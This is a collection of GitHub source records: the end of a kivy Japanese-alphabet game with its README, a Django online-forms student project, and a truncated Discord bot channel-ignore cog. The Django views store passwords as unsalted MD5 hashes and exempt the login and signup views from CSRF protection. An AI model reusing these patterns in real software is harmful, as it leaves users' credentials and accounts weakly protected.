= (pos_scale[0] * self.win_height + (self.win_width - pos_offset - self.win_height / 24),\n pos_scale[1] * self.win_height)\n animation += Animation(pos=pos, duration=2, t=animation_char_type)\n animation.bind(on_complete=self.animate_heart_bullet_x)\n animation.start(instance)\n\n def animate_flake_duration(self):\n if self.get_conf_mode() == long_limit_mode:\n return random.randint(12, 24) / self.get_conf_speed()\n\n return random.randint(6, 12) / self.get_conf_speed()\n\n def animate_flake(self, instance):\n instance.text=instance.kv_value # for prompt enabled\n animation = Animation(pos=instance.pos)\n animation += Animation(pos=(instance.pos[0], 0 - instance.size[0]),\n duration=self.animate_flake_duration())\n\n animation.bind(on_complete=self.animate_flake_restart)\n animation.start(instance)\n\n def animate_bullet_complete(self, animation, instance):\n instance.background_color=bullet_color\n instance.button.opacity = 0\n instance.pos=(self.win_width / 2 - self.win_width / 80,\n self.win_height / 24)\n instance.text=\"\"\n self.sounds[0].play()\n\n def animate_bullet_xx_complete(self, animation, instance): # important to author\n if instance.button not in self.buttons:\n return True\n\n self.heart_bullet = 100\n instance.background_color=bullet_color\n instance.text=\"\"\n\n def 
animate_bullet_x_complete(self, animation, instance): # important to author\n instance.button.opacity = 0\n self.sounds[0].play()\n animation = Animation(pos=instance.pos)\n pos=(self.win_width / 2 - self.win_width / 80, self.win_height / 24)\n animation += Animation(pos=pos, duration=1.5, t=\"in_circ\")\n animation.bind(on_complete=self.animate_bullet_xx_complete)\n animation.start(instance)\n\n def animate_bullet_x(self, instance): # important to author\n animation = Animation(pos=instance.pos)\n animation += Animation(pos=instance.button.pos, duration=1, t=\"in_circ\")\n animation.bind(on_complete=self.animate_bullet_x_complete)\n animation.start(instance)\n\n def animate_bullet(self, instance):\n animation = Animation(pos=instance.pos)\n animation += Animation(pos=instance.button.pos,\n duration=float(self.get_conf_delay()/10), t=\"in_circ\")\n animation.bind(on_complete=self.animate_bullet_complete)\n animation.start(instance)\n\n def help_return(self, instance = None):\n self.popup.dismiss()\n self.popup=None\n\n def help_press(self, instance = None):\n self.textinput.text=\"\"\n box = BoxLayout(orientation = 'vertical', padding = (self.box_padding)) # padding fix\n setup_label = Label(text = help_info, line_height = 1.2,\n size_hint=(1, 0.9), font_size=self.help_font_size, font_name=help_font)\n setup_button = Button(text = \"return\", size_hint=(1, 0.1), on_press = self.help_return)\n box.add_widget(setup_label)\n box.add_widget(setup_button)\n self.popup = Popup(title='Information', title_size = self.popup_font_size,\n title_align = 'center', content = box, auto_dismiss = False,\n size_hint=size_hint, size=(self.win_width * 3 / 4, self.win_height * 9 / 10))\n self.popup.open()\n return True\n\n def confs_press(self, instance = None):\n self.textinput.text=\"\"\n self.sounds[2].stop()\n\n box = BoxLayout(orientation = 'vertical', padding = (self.box_padding))\n setup_label = Label(text = \"Time | Alphabet | Mode | Cheat | Speed | FontSize | Delay | Flakes:\",\n size_hint=(1, 0.4), font_size=self.label_font_size)\n setup_input = TextInput(text=self.get_conf_all(), multiline=False, padding = (self.box_input_padding),\n size_hint=(1, 0.3), font_size=self.input_font_size)\n setup_button = Button(text = \"setup\", size_hint=(1, 0.3), on_press = self.setup_press)\n setup_button.setup_input = setup_input\n box.add_widget(setup_label)\n box.add_widget(setup_input)\n box.add_widget(setup_button)\n self.popup = Popup(title='Perference', title_size = self.popup_font_size,\n title_align = 'center', content = box, auto_dismiss = False,\n size_hint=size_hint, size=(self.win_width * 2 / 5, self.win_height * 2 / 5))\n self.popup.open()\n\n return True\n\n def button_press(self, instance):\n if not self.get_conf_prompt():\n return True\n\n if instance.text == instance.kv_value:\n if self.get_conf_char() == 2 and '_' in instance.kv_key: # important to author\n instance.text = instance.kv_key.split('_')[1]\n else:\n instance.text=instance.kv_key\n else:\n instance.text=instance.kv_value\n\n def set_random_char(self, button):\n keys=list(self.jp_map.keys())\n if not keys:\n if self.get_conf_char() == 2: # important to author\n value = flake_shape\n key=random.choice([\":D\", \";)\", \":P\", \"O.o\", \"\\o/\", \"^0^\", \">\\\"<\", \":)\", \"<3\"])\n else:\n value = flake_shapes[self.get_conf_char()%2]\n key = flake_shapes[(self.get_conf_char() + 1)%2]\n self.no_keys += 1\n button.text = value\n button.kv_key = key\n button.kv_value = value\n return True\n\n if self.get_conf_char() == 2: # important to 
author\n keys=list(sorted(self.jp_map.keys()))\n key=keys[0]\n else:\n key = random.choice(keys)\n val = self.jp_map[key]\n\n if self.get_conf_mode() == char_limit_mode or \\\n self.get_conf_char() == 2: # important to author\n self.jp_map.pop(key)\n\n button.text = val\n button.kv_key = key\n button.kv_value = val\n return True\n\n def create_flake(self, i, bullet):\n width = self.win_width / (3 * self.get_conf_flakes() - 2)\n button = Button(font_name=font_name, font_size=dp(self.get_conf_fsize()),\n pos=(width * 3 * i, self.win_height), \\\n background_color=flake_colors[i%6], on_press=self.button_press,\n size_hint=size_hint, size = (width, width))\n self.set_random_char(button)\n\n button.bullet = bullet\n bullet.button = button\n\n self.animate_flake(button)\n self.buttons.append(button)\n return button\n\n def create_bullet(self, bt_img = None):\n bullet = Button(size_hint=size_hint, size=(self.win_height / 24, self.win_height / 24),\n font_name=font_name, pos=(self.win_width / 2 - self.win_width / 80,\n self.win_height / 24), background_color=bullet_color)\n if not bt_img:\n return bullet\n\n bbl = StackLayout(size=bullet.size, pos=bullet.pos)\n img = Image(source=bt_img)\n bbl.add_widget(img)\n bullet.add_widget(bbl)\n\n bullet.bind(on_press=self.help_press)\n return bullet\n\n def create_cmdline(self):\n textinput = TextInput(pos=(self.win_width / 2 - self.win_width / 80, self.win_height / 120),\n size_hint=size_hint, size=(self.win_width / 8, self.win_height / 24),\n multiline=False, background_color=(0,0,0,0), foreground_color=(0,0,0,1))\n self.textinput = textinput\n\n return self.textinput\n\n def create_keyboard(self):\n self._keyboard = Window.request_keyboard(self.keyboard_closed, self)\n self._keyboard.bind(on_key_down=self.on_keyboard_down)\n Window.bind(on_resize=self.on_window_resize)\n\n def create_sounds(self):\n self.sounds.append(SoundLoader.load(shot_sound))\n self.sounds.append(SoundLoader.load(miss_sound))\n self.sounds.append(SoundLoader.load(bg_sound))\n self.sounds[2].loop=True\n self.sounds[2].play()\n\n def init_window(self):\n self.title = title\n self.textinput=None\n self.sounds=[]\n self.popup=None\n self.reset_stats()\n\n def load_confs(self):\n self.confs=confs\n if os.path.exists(conf_path):\n newconfs = pickle.load(open(conf_path,'rb'))\n if len(newconfs) == len(self.confs):\n self.confs = newconfs\n\n def build(self):\n self.load_confs()\n self.init_window()\n self.create_sounds()\n self.create_keyboard()\n\n self.layout = FloatLayout()\n self.reset_widgets()\n\n return self.layout\n\nif __name__ == '__main__': JPTest().run()\n" }, { "alpha_fraction": 0.5764309763908386, "alphanum_fraction": 0.5966330170631409, "avg_line_length": 44, "blob_id": "4b667969ec1bf97644af8fbe4a10a363bc486b8d", "content_id": "4c1e3a23c0aa3551006d7a4c928bb32f20704b96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1485, "license_type": "no_license", "max_line_length": 77, "num_lines": 33, "path": "/README.md", "repo_name": "lxin/jptest", "src_encoding": "UTF-8", "text": "# jptest\nA kivy example for Japanese alphabet\n\nHelp:\n1. system commands: help, exit, setup, ... 
(you can type once the app starts)\n * help: it comes to this page\n * exit: close the window\n * setup: you would be able to see a textinput box:\n\n Time | Alphabet | Mode | Cheat | Speed | FontSize | Delay | Flakes:\n 60, 0, 0, 1, 1, 30, 5, 6\n\n - Time: 1-n => the certain time, see Mode 0\n - Alphabet: 0 => hiragana 1 => katakana 2 => kanji\n -1 => load the user-defined map from ~/jp_ext.map\n - Mode: 0 => count the character number in a certain time\n 1 => count the time after you finish all characters\n 2 => shoot all before any flakes touch the bottom\n - Cheat: 0 => disable the prompt by clicking the flakes\n 1 => enable the prompt by clicking the flakes\n - Speed: 1-n => flakes fall faster as the value gets bigger\n - FontSize: 1-n => the font size on each flake\n - Delay: 0 => no animation delay, shoot extremely fast\n 1-n => the animation duration for shooting\n - Flakes:1-n => the number of the Flakes\n * ...: others would be matched with the flakes\n2. clicks: on-flakes, on-bullet\n * on-flakes: show the prompt if Cheat is enabled\n * on-bullet: it comes to this page, as help cmd does\n\nCopyright:\n1. Powered By : Xin Long <[email protected]>\n2. Source Code : https://github.com/lxin/jptest\n" } ]
2
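The falling-flake loop in jptest's main.py above is built from kivy's `Animation`: each flake animates from the top of the window to below the bottom edge, and the `on_complete` handler respawns it at the top and starts the fall again. A minimal sketch of that loop, assuming arbitrary sizes and speeds and a single flake (the real app spawns several, randomizes the character on each respawn, and chains animations with `+=`):

```python
import random

from kivy.animation import Animation
from kivy.app import App
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.uix.floatlayout import FloatLayout


class FallingFlake(App):
    def restart(self, animation, flake):
        # Mirrors animate_flake_restart(): move back to a random x at the
        # top of the window, then start another fall.
        flake.pos = (random.uniform(0, Window.width - flake.width), Window.height)
        self.fall(flake)

    def fall(self, flake):
        # Animate pos down past the bottom edge; binding on_complete is what
        # turns a one-shot animation into a loop.
        anim = Animation(pos=(flake.x, -flake.height),
                         duration=random.uniform(4, 8))
        anim.bind(on_complete=self.restart)
        anim.start(flake)

    def build(self):
        root = FloatLayout()
        # The glyph may not render in the default font; the repo ships its own.
        flake = Button(text="\u2764", size_hint=(None, None), size=(50, 50),
                       pos=(100, Window.height))
        root.add_widget(flake)
        self.fall(flake)
        return root


if __name__ == "__main__":
    FallingFlake().run()
```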
subhojeet/Online-Forms
https://github.com/subhojeet/Online-Forms
659654c7046b1f05cc2f69a95cf7f9c62cd3f261
6d311cf12d3fabad04c414755b560cd3f402c1da
dd99a9f9c9576077392cf1204c8634815e36f829
refs/heads/master
2021-01-10T03:04:32.348416
2015-09-29T18:36:21
2015-09-29T18:36:21
43,386,563
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7431507110595703, "alphanum_fraction": 0.7577054500579834, "avg_line_length": 33.32352828979492, "blob_id": "9cf54fb55c492117e9dc42f73c146ac6301394c4", "content_id": "08d3ffb8132d5912c4a57249d0180454c7fcb1fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2336, "license_type": "no_license", "max_line_length": 65, "num_lines": 68, "path": "/online_forms/models.py", "repo_name": "subhojeet/Online-Forms", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\n\nclass user_table(models.Model):\n\tuser_id = models.AutoField(primary_key=True)\n\tusername = models.CharField(unique=True,max_length=100)\n\tpassword = models.CharField(max_length=100)\n\tdef __str__(self):\n\t\treturn self.username\n\nclass user_info(models.Model):\n\tuser = models.ForeignKey(user_table)\n\tgroup = models.ForeignKey('group_table',primary_key=True)\n\tfirst_name = models.CharField(max_length=200,null=True)\n\tlast_name = models.CharField(max_length=200,null=True)\n\nclass group_table(models.Model):\n\tgroup_id = models.AutoField(primary_key=True)\n\tpermissions = models.IntegerField()\n\nclass form_table(models.Model):\n\tuser = models.ForeignKey(user_table)\n\tform_id = models.AutoField(primary_key=True)\n\tform_permissions = models.IntegerField()\n\tdef __str__(self):\n\t\treturn str(self.form_id)\n\nclass form_object_table(models.Model):\n\tform = models.ForeignKey(form_table,primary_key=True)\n\tresponse_url = models.CharField(max_length=100,unique=True)\n\tform_url = models.CharField(max_length=100,unique=True)\n\tform_title = models.CharField(max_length=200)\n\tform_description = models.CharField(max_length=500)\n\tflag = models.BooleanField(\"Form is Active or Not\",default=True)\n\tclass Meta:\n\t\tverbose_name = 'Form'\n\t\tverbose_name_plural = 'Forms'\n\nclass elements_table(models.Model):\n\tform_object = models.ForeignKey('form_object_table')\n\telements_id = models.AutoField(primary_key=True)\n\tparent_id = models.IntegerField()\n\tInput = models.ForeignKey('input_object_table')\n\trequired = models.BooleanField(default=False)\n\tdescription = models.TextField();\n\ttitle = models.CharField(max_length=1000)\n\tpriority = models.IntegerField()\n\tdef __str__(self):\n\t\treturn str(self.elements_id)\n\nclass input_object_table(models.Model):\n\tinput_id = models.AutoField(primary_key=True)\n\tinput_type = models.CharField(max_length=100)\n\tdef __str__(self):\n\t\treturn self.input_type\n\nclass response_object_table(models.Model):\n\tuser = models.ForeignKey(user_table)\n\tform = models.ForeignKey(form_table)\n\telements = models.ForeignKey(elements_table)\n\tresponse_string = models.TextField()\n\tresponse_time = models.DateTimeField()\n\nclass choice(models.Model):\n\telements = models.ForeignKey('elements_table')\n\tchoice_id = models.AutoField(primary_key=True)\n\tchoice_description = models.CharField(max_length=500)\n\t\n" }, { "alpha_fraction": 0.642011821269989, "alphanum_fraction": 0.642011821269989, "avg_line_length": 36.55555725097656, "blob_id": "66aa23af7b9ce7f77b71ba34d6dc383bb780be17", "content_id": "ae7d2cf4b570543edb51634ef141e2781626880c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 338, "license_type": "no_license", "max_line_length": 66, "num_lines": 9, "path": "/online_forms/urls.py", "repo_name": "subhojeet/Online-Forms", "src_encoding": "UTF-8", "text": "from django.conf.urls import 
patterns,url\n\nfrom online_forms import views;\n\nurlpatterns = patterns('',\n\t\t\turl(r'^login/$',views.login, name = 'login'),\n\t\t\turl(r'^signup/$',views.signup, name = 'signup'),\n\t\t\turl(r'^fill/(?P<form_hash>\\w+)/$',views.fill_form,name='fill'),\n\t\t\turl(r'^view/(?P<form_hash>\\w+)/$',views.view_form,name='view'))\n" }, { "alpha_fraction": 0.7359747290611267, "alphanum_fraction": 0.7377278804779053, "avg_line_length": 38.61111068725586, "blob_id": "1641cb565d17a9469e559d63fde75305f6828976", "content_id": "27654b8f057bea5d3b8bf719e3acf5353c5a5ec2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2852, "license_type": "no_license", "max_line_length": 95, "num_lines": 72, "path": "/online_forms/admin.py", "repo_name": "subhojeet/Online-Forms", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom online_forms.models import *\nfrom django.db.models.signals import pre_save\nfrom django.dispatch import receiver,Signal\nfrom django.http import HttpResponse, HttpRequest\nimport hashlib\nfrom nested_inlines.admin import NestedStackedInline, NestedTabularInline, NestedModelAdmin\n# Register your models here.\nclass ChoiceTypeInline(NestedStackedInline):\n\tmodel = choice\n\textra = 0\nclass ElementsShowInline(NestedStackedInline):\n\tmodel=elements_table\n\textra= 1\n\tinlines = [ChoiceTypeInline,]\n\tfieldsets = [\n\t\t('Add Elements to Form', {'fields': ['title','description','Input','required','priority']}),\n \n\t]\n\n'''\tdef save_model(self,request,obj,form,change):\n\t\tif obj.parent_id is None:\n\t\t\tobj.parent_id = obj.form_id\n\t\tobj.save()'''\n\t\t\nclass form_object_table_admin(NestedModelAdmin):\n\tfieldsets = [\n\t\t('Form', {'fields': ['form_title','form_description','flag']}),\n \n\t]\n\tinlines = [ElementsShowInline,]\n\tlist_display = ('form_title','form_description','form_response_link','form_view_link')\n\tdef form_response_link(self,obj):\n\t\treturn \"<a target='_blank' href='../../../forms/view/%s'>Click Here</a>\" % (obj.response_url)\n\tdef form_view_link(self,obj):\n\t\treturn \"<a target='_blank' href='../../../forms/fill/%s'>Click Here</a>\" % (obj.form_url)\n\tform_response_link.allow_tags = True\n\tform_response_link.short_description = 'View Your Form Response Here'\n\tform_view_link.allow_tags = True\n\tform_view_link.short_description = 'View Your Form Render Here'\n\tdef queryset(self,request):\n\t\tqs = super(form_object_table_admin,self).queryset(request)\n\t\tif request.user.is_superuser:\n\t\t\treturn qs\n\t\telse:\n\t\t\tuser_ = user_table.objects.get(username=request.user.username)\n\t\t\tform_list = form_table.objects.filter(user=user_)\n\t\t\treturn qs.filter(form__in=form_list)\n\tdef save_model(self,request,obj,form,change):\n\t\tif obj.form_id is None:\n\t\t\tuser_ = user_table.objects.get(username=request.user.username)\n\t\t\tcurr_form = form_table(user = user_ , form_permissions = 1)\n\t\t\tcurr_form.save()\n\t\t\tobj.form_id = curr_form.form_id\n\t\t\tobj.response_url = hashlib.md5(request.user.username+str(obj.form_id)).hexdigest()\n\t\t\tobj.form_url = hashlib.sha1(request.user.username+str(obj.form_id)).hexdigest()\n\t\tobj.save()\n\nadmin.site.register(user_table)\nadmin.site.register(group_table)\nadmin.site.register(user_info)\nadmin.site.register(form_object_table,form_object_table_admin)\nadmin.site.register(form_table)\nadmin.site.register(input_object_table)\nadmin.site.register(response_object_table)\n@receiver(pre_save,sender=elements_table)\ndef 
create_parent_per_element(sender,instance,**kwargs):\n\tif instance.parent_id is None:\n\t\tinstance.parent_id = instance.form_object.form_id\n\tpre_save.disconnect(create_parent_per_element,sender=elements_table)\n\tinstance.save()\n\tpre_save.connect(create_parent_per_element,sender=elements_table)\n" }, { "alpha_fraction": 0.7808619141578674, "alphanum_fraction": 0.782322883605957, "avg_line_length": 33.224998474121094, "blob_id": "9abefd21ef18991b67414b80d16e71cdeb954e69", "content_id": "628206ba477640484cbc08a2e52d8e44808d0bdb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1369, "license_type": "no_license", "max_line_length": 114, "num_lines": 40, "path": "/main.py", "repo_name": "subhojeet/Online-Forms", "src_encoding": "UTF-8", "text": "import os\nimport sys\n#sys.path.append('/django')\nsys.path.append('/database_project/settings.py')\n#sys.path.append('/usr/local/lib/python2.7/dist-packages/nested_inline')\nimport logging\n# Google App Engine imports.\nfrom google.appengine.ext.webapp import util\n# A workaround to fix the partial initialization of Django before we are ready\n#from django.core.management import setup_environ\nfrom django.conf import settings\n\n#setup_environ(settings)\n#print settings.ROOT_URLCONF\nos.environ['DJANGO_SETTINGS_MODULE'] = 'database_project.settings'\n#settings._target = None\n# Import various parts of Django.\nimport django.core.handlers.wsgi\nimport django.core.signals\nimport django.dispatch.dispatcher\nimport django.db\n\ndef log_exception(*args, **kwds):\n\t\"\"\"Log the current exception.\n\tInvoked when a Django request raises an exception\"\"\"\n\tlogging.exception(\"Exception in request:\")\n\t# Log errors\n\n#django.dispatch.dispatcher.connect(log_exception,django.core.signals.got_request_exception)\n# Unregister the rollback event handler\n#django.dispatch.dispatcher.disconnect(django.db._rollback_on_exception,django.core.signals.got_request_exception)\n\ndef main():\n\t# Create a Django application for WSGI.\n\tapplication = django.core.handlers.wsgi.WSGIHandler()\n\t# Run the WSGI CGI handler with that application.\n\tutil.run_wsgi_app(application)\n\nif __name__ == '__main__':\n\tmain()\n" }, { "alpha_fraction": 0.7746478915214539, "alphanum_fraction": 0.7887324094772339, "avg_line_length": 34.5, "blob_id": "5dafe78b7307ae64670cfada9b13270ea88ff394", "content_id": "78d446989eccd9e3962e172adcdd88af09805be8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 71, "license_type": "no_license", "max_line_length": 55, "num_lines": 2, "path": "/README.md", "repo_name": "subhojeet/Online-Forms", "src_encoding": "UTF-8", "text": "# Online-Forms\nSem 6 database project( online forms for IITG intranet)\n" }, { "alpha_fraction": 0.6887417435646057, "alphanum_fraction": 0.6964949369430542, "avg_line_length": 36.07185745239258, "blob_id": "0fe398bb0f5cea9afb7df4b9b591feb5f6193e0b", "content_id": "be6f2a402b2b5b3f8bd62831dd96d24577117e62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6191, "license_type": "no_license", "max_line_length": 142, "num_lines": 167, "path": "/online_forms/views.py", "repo_name": "subhojeet/Online-Forms", "src_encoding": "UTF-8", "text": "from django.shortcuts import render_to_response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.models import Group\nfrom 
django.contrib.auth import authenticate,logout\nfrom django.contrib.auth import login as login_user\nfrom django.contrib import staticfiles\nimport datetime, hashlib, json,os, random\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.http import Http404\nfrom models import *\nfrom datetime import datetime\n\nimport json\n# Create your views here.\n\n@csrf_exempt\ndef login(request):\n\tif request.method == 'GET':\n\t\treturn render_to_response('login.html')\n\telse:\n\t\tif request.user.is_authenticated():\n\t\t\tlogout(request)\n\t\tuser_name = request.POST.get('email')\n\t\tuser_pass = request.POST.get('password')\n\t\t#user = user_table.objects.get( user_table__username = user_name,user_table__password = user_pass )\n\t\tuser = authenticate(username = user_name,password = user_pass)\n\t\tif user is not None:\n\t\t\tif user.is_active:\n\t\t\t\tlogin_user(request,user)\n\t\t\t\treturn HttpResponseRedirect('../../admin/')\n\t\t\telse:\n\t\t\t\treturn render_to_response('login.html',{'errormsg':'User not active'})\n\t\telse:\n\t\t\treturn render_to_response('login.html',{'errormsg':'Invalid login'})\n\n@csrf_exempt\ndef signup(request):\n\tif request.method == 'GET':\n\t\treturn render_to_response('signup.html')\n\telse:\n\t\tif request.user.is_authenticated():\n\t\t\tlogout(request)\n\t\tuser_email = request.POST.get('email')\n\t\tuser_pass = request.POST.get('password')\n\t\tuser_firstname = request.POST.get('firstname')\n\t\tuser_lastname = request.POST.get('lastname')\n\t\tuser_list = User.objects.filter(username = user_email)\n\t\tif len(user_list) !=0 :\n\t\t\treturn render_to_response('signup.html',{'errormsg':'User already registered!!'})\n\t\telse:\n\t\t\tuser = User.objects.create_user(username=user_email,password=user_pass,email=user_email,first_name=user_firstname,last_name=user_lastname)\n\t\t\tuser.is_staff = True\n\t\t\tuser.groups.add(Group.objects.get(name='norm_users'))\n\t\t\tuser.save()\n\t\t\tnew_pass = hashlib.md5(user_pass).hexdigest()\n\t\t\tform_new_user = user_table(username=user_email,password=new_pass)\n\t\t\tform_new_user.save()\n\t\t\tuser_group = group_table.objects.get(permissions=1)\n\t\t\tnew_user_obj = user_info(user=form_new_user,first_name=user_firstname,last_name=user_lastname,group=user_group)\n\t\t\tnew_user_obj.save()\n\t\t\treturn HttpResponseRedirect('../login/')\n\n\n@csrf_exempt\ndef fill_form(request,**kwargs):\n\tif request.method == 'GET':\n\t\tform_hash_id = kwargs.get('form_hash')\n\t\tf_obj = form_object_table.objects.filter(form_url = form_hash_id)\n\t\tif len(f_obj) is 0 :\n\t\t\traise Http404('Form Not Found.')\n\t\tif f_obj[0].flag is False:\n\t\t\traise Http404('Form not active.')\n\t\telse:\n\t\t\tf_obj = f_obj[0]\n\t\t\tf_elements = elements_table.objects.filter(form_object = f_obj).order_by('priority')\n\t\t\tf_title = f_obj.form_title\n\t\t\tf_desc = f_obj.form_description\n\t\t\trender_list = list()\n\t\t\tfor ele in f_elements:\n\t\t\t\tndict = dict()\n\t\t\t\tndict['title'] = ele.title\n\t\t\t\tndict['description'] = ele.description\n\t\t\t\tndict['required'] = ele.required\n\t\t\t\tndict['input_type'] = ele.Input.input_type \n\t\t\t\tchoice_vals = list()\n\t\t\t\tif ele.Input.input_type == 'radio' or ele.Input.input_type == 'select':\n\t\t\t\t\tchoices = choice.objects.filter(elements=ele)\n\t\t\t\t\tfor choice_v in choices:\n\t\t\t\t\t\tchoice_vals.append(choice_v.choice_description)\n\t\t\t\tndict['choices'] = choice_vals\n\t\t\t\tndict['id']= 
ele.elements_id\n\t\t\t\trender_list.append(ndict)\n\t\t\treturn render_to_response('display.html',{'title':f_title,'description':f_desc,'elements':render_list})\n\n\tif request.method == 'POST':\n\t\tform_hash_id = kwargs.get('form_hash')\n\t\tf_obj = form_object_table.objects.filter(form_url = form_hash_id)\n\t\tif len(f_obj) is 0:\n\t\t\traise Http404('Some Error Occured!!')\n\t\telse:\n\t\t\tf_obj = f_obj[0]\n\t\t\tuser_ = None\n\t\t\tif not request.user.is_authenticated():\n\t\t\t\tuser_ = user_table.objects.get(username='[email protected]')\n\t\t\telse:\n\t\t\t\tuser_ = user_table.objects.get(username = request.user.email)\n\t\t\telements_list = elements_table.objects.filter(form_object = f_obj)\n\t\t\tfor elements in elements_list:\n\t\t\t\tele_string = request.POST.get(str(elements.elements_id))\t\n\t\t\t\tresponse = response_object_table(user=user_,form=f_obj.form,elements = elements,response_string = ele_string,response_time=datetime.now())\n\t\t\t\tresponse.save()\n\t\t\treturn render_to_response('thanks.html',{'form_resubmit':request.get_full_path()})\n\n@csrf_exempt\ndef view_form(request, **kwargs):\n\tif not request.user.is_authenticated():\n\t\traise Http404('Please Log in to view the responses for this form')\n\telse:\n\t\t\n\t\tform_hash_id = kwargs.get('form_hash')\n\t\tf_obj = form_object_table.objects.filter(response_url = form_hash_id)\n\t\tif len(f_obj) is 0:\n\t\t\traise Http404('Form not found')\n\t\telse:\n\t\t\tf_obj = f_obj[0]\n\t\t\tresponse_list = response_object_table.objects.filter(form=f_obj.form)\n\t\t\trender_list = list()\n\t\t\telement_list = list()\n\t\t\tfor response in response_list:\n\t\t\t\tif not response.elements.title in element_list:\n\t\t\t\t\telement_list.append(response.elements.title)\n\t\t\tcount=0\n\t\t\telement_dict = dict()\n\t\t\tfor element_title in element_list:\n\t\t\t\tcount = count+1\n\t\t\t\telement_dict[element_title]=''\n\n\t\t\tk=0\n\t\t\tfor response in response_list:\n\t\t\t\tndict = dict()\n\t\t\t\tndict['username'] = response.user.username\n\t\t\t\tfor element_title in element_list:\n\t\t\t\t\tndict[element_title] = ' '\n\t\t\t\telement_dict[response.elements.title] = response.response_string\n\t\t\t\t#ndict[response.elements.title] = response.response_string\n\t\t\t\tndict['Submission Time'] = str(response.response_time)\n\t\t\t\tk=k+1\n\t\t\t\tif count == k:\n\t\t\t\t\tk=0\n\t\t\t\t\tfor element_title in element_list:\n\t\t\t\t\t\tndict[element_title]=element_dict[element_title]\n\t\t\t\t\t'''for p in xrange(0,100):\n\t\t\t\t\t\tndict[str(p)] = '''\n\t\t\t\t\trender_list.append(ndict)\n\t\t\t'''for k in xrange(0,100):\n\t\t\t\tndict = dict()\n\t\t\t\tndict['username'] =' '\n\t\t\t\tfor element_title in element_list:\n\t\t\t\t\tndict[element_title] = ' '\n\t\t\t\tndict['Submission Time'] = ' '\n\t\t\t\tfor p in xrange(0,100):\n\t\t\t\t\tndict[str(p)] = \n\t\t\t\trender_list.append(ndict)'''\n\t\t\t\n\t\t\treturn render_to_response('spreadsheet.html',{'form_title':f_obj.form_title, 'response':json.dumps(render_list)})\n" } ]
6
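In the Online-Forms record above, admin.py's `save_model()` derives a form's two public URLs by hashing the owner's username concatenated with the form id — MD5 for the response-viewing URL and SHA-1 for the fill URL — which views.py then matches in `view_form` and `fill_form`. A sketch of that derivation, ported to Python 3 (the repo is Python 2 and hashes the string directly; Python 3 requires bytes); the username and form id here are made up:

```python
import hashlib

def make_form_urls(username: str, form_id: int) -> tuple[str, str]:
    # admin.py seeds both hashes with username + str(form_id); Python 3 needs
    # the concatenation encoded to bytes before hashing.
    seed = (username + str(form_id)).encode("utf-8")
    response_url = hashlib.md5(seed).hexdigest()   # matched by /forms/view/<hash>
    form_url = hashlib.sha1(seed).hexdigest()      # matched by /forms/fill/<hash>
    return response_url, form_url

if __name__ == "__main__":
    resp, fill = make_form_urls("alice@example.com", 42)
    print("fill url: /forms/fill/" + fill)
    print("view url: /forms/view/" + resp)
```

Because both digests are deterministic functions of guessable inputs, these URLs provide obscurity rather than secrecy; a random per-form token (e.g. `secrets.token_urlsafe()`) would be a stronger choice.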
johnvictorfs/talk_bot
https://github.com/johnvictorfs/talk_bot
992dc2d1ea98cdc2007ca5ffe591c92824c87686
a5905b88114139bf33889ab935364a686b7a9dc9
7d8df966eca73eafc444c833ed00a0912ddd2f19
refs/heads/master
2020-04-23T09:51:57.045795
2019-02-24T00:25:39
2019-02-24T00:25:39
171,084,015
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6243868470191956, "alphanum_fraction": 0.6370006799697876, "avg_line_length": 35.589744567871094, "blob_id": "a7ee46a2d53c8dfc9845b3094e6521c5f68e4ea2", "content_id": "9fa409ec5ff6f178d7ce64e6afdb745bb95f1878", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2854, "license_type": "no_license", "max_line_length": 115, "num_lines": 78, "path": "/talk_bot/cogs/management.py", "repo_name": "johnvictorfs/talk_bot", "src_encoding": "UTF-8", "text": "import re\n\nfrom discord.ext import commands\n\nfrom talk_bot.orm.models import IgnoredChannel\n\n\nclass ManagementCommands(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.has_permissions(manage_channels=True)\n @commands.command(aliases=['ignore'])\n async def ignore_channel(self, ctx: commands.Context, channel_str: str):\n \"\"\"\n Ignores a channel so new messages from it are not stored in the bot's database\n\n Requires:\n Permissions:\n - Manage Server\n \"\"\"\n\n # Searches for channel id in string like'<#546528012430999552>'\n channel_id = re.search(r'\\d+', channel_str)\n\n if not channel_id:\n return await ctx.send(f'Invalid Channel: {channel_str}')\n\n channel_id = int(channel_id.group())\n channel = self.bot.get_channel(channel_id)\n if not channel:\n return await ctx.send(f'Invalid Channel: {channel_str}')\n\n # Only allow a channel to be ignored if the ignore command was sent in the same guild as that channel\n if channel in ctx.guild.channels:\n ignored, created = IgnoredChannel.get_or_create(channel_id=channel_id)\n if not created:\n return await ctx.send(f'Channel <#{channel_id}> is already ignored.')\n return await ctx.send(f'Channel <#{channel_id}> ignored successfully.')\n else:\n return await ctx.send(\"You can only ignore channels from the same server you're sending this command.\")\n\n @commands.has_permissions(manage_channels=True)\n @commands.command(aliases=['unignore'])\n async def unignore_channel(self, ctx: commands.Context, channel_str: str):\n \"\"\"\n Un-ignores a channel so new messages from it are again stored in the bot's database\n\n Requires:\n Permissions:\n - Manage Server\n \"\"\"\n\n # Searches for channel id in string like'<#546528012430999552>'\n channel_id = re.search(r'\\d+', channel_str)\n\n if not channel_id:\n return await ctx.send(f'Invalid Channel: {channel_str}')\n\n channel_id = int(channel_id.group())\n channel = IgnoredChannel.get(IgnoredChannel.channel_id == channel_id)\n if not channel:\n return await ctx.send(f'Channel <#{channel_id}> is already not being ignored.')\n\n 